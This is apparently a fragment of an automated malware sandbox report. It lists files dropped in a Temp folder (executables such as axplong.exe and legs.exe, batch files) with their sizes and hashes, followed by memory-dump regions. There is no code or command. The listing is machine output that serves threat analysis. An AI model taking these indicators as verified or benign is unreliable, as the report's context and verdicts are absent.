SHA5127a66c5d043139a3b20814ac65110f8151cf652e3f9d959489781fdaea33e9f53ce9fd1992f1a32bff73380c7d9ef47200d8b924a8adf415e7a93421d62eb054d
-
C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exeFilesize
659KB
MD5bbd06263062b2c536b5caacdd5f81b76
SHA1c38352c1c08fb0fa5e67a079998ef30ebc962089
SHA2561875275da8d576fd9962c5b2bd9fe0e4b4d188caad9549125c8a64ecaf9308c9
SHA5127faa4e18cc9d7d82cb8efe8494668e05f75ddd5a8c9c9a058b2246a786a60d7761168862220b70820b02f38f196cfb5f106db36cdcfd5a5a3f9dfd01654eb9ad
-
C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exeFilesize
5.8MB
MD56c149b39619395a8ba117a4cae95ba6f
SHA13ef8be98589745ecce5522dd871e813f69a7b71b
SHA256c43b64c78f6ccba5cfb7de13fc39d5cc43fad9a9f5e78799b34100ab69e5e4e8
SHA512866edae7858e7bfb82486e99b31550307de81fa732a3075b6e2ff0abcade5331be28bb14d894cdf5176dc907a45aaa1407b6d8c4295cc69b6d45516f319560a4
-
C:\Users\Admin\AppData\Local\Temp\6.exeFilesize
4.8MB
MD55bb3677a298d7977d73c2d47b805b9c3
SHA191933eb9b40281e59dd7e73d8b7dac77c5e42798
SHA25685eb3f6ba52fe0fd232f8c3371d87f7d363f821953c344936ab87728ba6a627f
SHA512d20f862e9fadb5ad12eddaae8c6ebbfa03d67d35c5ca272e185206eb256cd6a89c338ce608c992df715d36a3f1624a507dbe324a057bd412b87438f4a008f33d
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeFilesize
1.8MB
MD52e70b996132ba5d2caae18bc7479fd8c
SHA14569cc7318cc3cf4496f5293df0e5c4430b1c696
SHA256c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da
SHA5122cccfc7adb6d653497037d8742dd47cd4969445e277db1791df0c70a0a06b60a05c663f5001ec4cbbf8f845f7a01ff8d81f0451680791f2140640eebc33266f9
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ins.batFilesize
1KB
MD50be4cbfa51fe5f8010e78553a28f2779
SHA1ae21783c148ae1443fa87a43b9b51cb0ab1a799b
SHA256cc56d197270cdf7c3b5c193ec5b3c63dd87b57b58f90571649f8f0e29a6f1a90
SHA512337a332eecb12cb065a09b3ae01e86802082c576b203ffd1a8270c69172036dc244ecffad1fba3de76d573c77f1315821a563d2a4aed73bfeb9e9bdf6107edfd
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qnaiedbd.4nd.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.batFilesize
568B
MD5e861a08036b9eb5f216deb58e8a7934d
SHA15f12dd049df2f88d95f205a4adc307df78ac16ee
SHA256e8315164849216f4c670c13b008e063da2176efb5d08939caa321e39a33035eb
SHA5127ea2fd3b085bd4b3e27d4dda36e079ec8910173cc2b33ccd06698051eb7d5f2818ed9000761d1fc44e354c06d015feb16e77958dab8a3969a0cee2fd453ca0c9
-
\??\pipe\LOCAL\crashpad_2560_SDFEYXMTDGJSKLTBMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/372-141-0x00000246F2B30000-0x00000246F2B52000-memory.dmpFilesize
136KB
-
memory/468-228-0x0000000000400000-0x0000000000441000-memory.dmpFilesize
260KB
-
memory/812-582-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/812-584-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-585-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-589-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-167-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-549-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-464-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-539-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-21-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-586-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-587-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-538-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-588-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-556-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-18-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-19-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-257-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-259-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-258-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-20-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-314-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-537-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1564-302-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/1644-45-0x0000000006160000-0x0000000006778000-memory.dmpFilesize
6.1MB
-
memory/1644-46-0x0000000005420000-0x000000000552A000-memory.dmpFilesize
1.0MB
-
memory/1644-150-0x0000000005C10000-0x0000000005C76000-memory.dmpFilesize
408KB
-
memory/1644-40-0x000000007369E000-0x000000007369F000-memory.dmpFilesize
4KB
-
memory/1644-41-0x0000000000570000-0x00000000005C0000-memory.dmpFilesize
320KB
-
memory/1644-42-0x0000000005590000-0x0000000005B36000-memory.dmpFilesize
5.6MB
-
memory/1644-43-0x0000000005080000-0x0000000005112000-memory.dmpFilesize
584KB
-
memory/1644-44-0x0000000005210000-0x000000000521A000-memory.dmpFilesize
40KB
-
memory/1644-256-0x0000000007FE0000-0x0000000008030000-memory.dmpFilesize
320KB
-
memory/1644-49-0x00000000053B0000-0x00000000053FC000-memory.dmpFilesize
304KB
-
memory/1644-48-0x0000000005370000-0x00000000053AC000-memory.dmpFilesize
240KB
-
memory/1644-47-0x0000000005310000-0x0000000005322000-memory.dmpFilesize
72KB
-
memory/2456-66-0x0000000000400000-0x0000000000450000-memory.dmpFilesize
320KB
-
memory/2668-65-0x0000000000E40000-0x0000000000E41000-memory.dmpFilesize
4KB
-
memory/2668-67-0x0000000000E40000-0x0000000000E41000-memory.dmpFilesize
4KB
-
memory/2940-294-0x00000000007F0000-0x00000000007F1000-memory.dmpFilesize
4KB
-
memory/2940-295-0x0000000000CA0000-0x00000000014BE000-memory.dmpFilesize
8.1MB
-
memory/3284-0-0x0000000000E50000-0x0000000001316000-memory.dmpFilesize
4.8MB
-
memory/3284-3-0x0000000000E50000-0x0000000001316000-memory.dmpFilesize
4.8MB
-
memory/3284-1-0x0000000077CD6000-0x0000000077CD8000-memory.dmpFilesize
8KB
-
memory/3284-5-0x0000000000E50000-0x0000000001316000-memory.dmpFilesize
4.8MB
-
memory/3284-17-0x0000000000E50000-0x0000000001316000-memory.dmpFilesize
4.8MB
-
memory/3284-2-0x0000000000E51000-0x0000000000E7F000-memory.dmpFilesize
184KB
-
memory/3828-458-0x00007FF7124C0000-0x00007FF712AF6000-memory.dmpFilesize
6.2MB
-
memory/3828-307-0x00007FF7124C0000-0x00007FF712AF6000-memory.dmpFilesize
6.2MB
-
memory/4488-521-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/4488-515-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/4488-514-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/4488-518-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/4488-517-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/4488-516-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/4824-166-0x0000000000400000-0x0000000000470000-memory.dmpFilesize
448KB
-
memory/4824-237-0x0000000009E40000-0x000000000A002000-memory.dmpFilesize
1.8MB
-
memory/4824-227-0x00000000093B0000-0x00000000093CE000-memory.dmpFilesize
120KB
-
memory/4824-226-0x0000000009430000-0x00000000094A6000-memory.dmpFilesize
472KB
-
memory/4824-238-0x000000000A540000-0x000000000AA6C000-memory.dmpFilesize
5.2MB
-
memory/5220-531-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5220-535-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5220-522-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5220-529-0x0000000000DE0000-0x0000000000E00000-memory.dmpFilesize
128KB
-
memory/5220-528-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5220-527-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5220-536-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5220-534-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5220-533-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5220-532-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5220-530-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5220-525-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5220-526-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5220-524-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5220-523-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5456-361-0x000001F4324B0000-0x000001F4324BA000-memory.dmpFilesize
40KB
-
memory/5456-360-0x000001F4324D0000-0x000001F4324E2000-memory.dmpFilesize
72KB
-
memory/5472-505-0x000001A8765F0000-0x000001A8765FA000-memory.dmpFilesize
40KB
-
memory/5472-508-0x000001A876840000-0x000001A87685A000-memory.dmpFilesize
104KB
-
memory/5472-507-0x000001A8767E0000-0x000001A8767EA000-memory.dmpFilesize
40KB
-
memory/5472-506-0x000001A876800000-0x000001A87681C000-memory.dmpFilesize
112KB
-
memory/5472-511-0x000001A876830000-0x000001A87683A000-memory.dmpFilesize
40KB
-
memory/5472-495-0x000001A876620000-0x000001A8766D3000-memory.dmpFilesize
716KB
-
memory/5472-494-0x000001A876600000-0x000001A87661C000-memory.dmpFilesize
112KB
-
memory/5472-509-0x000001A8767F0000-0x000001A8767F8000-memory.dmpFilesize
32KB
-
memory/5472-510-0x000001A876820000-0x000001A876826000-memory.dmpFilesize
24KB
-
memory/6040-459-0x0000000000B40000-0x0000000000B96000-memory.dmpFilesize
344KB
-
memory/6040-457-0x0000000000B40000-0x0000000000B96000-memory.dmpFilesize
344KB
-
memory/6096-463-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB
-
memory/6096-461-0x0000000000BA0000-0x0000000001066000-memory.dmpFilesize
4.8MB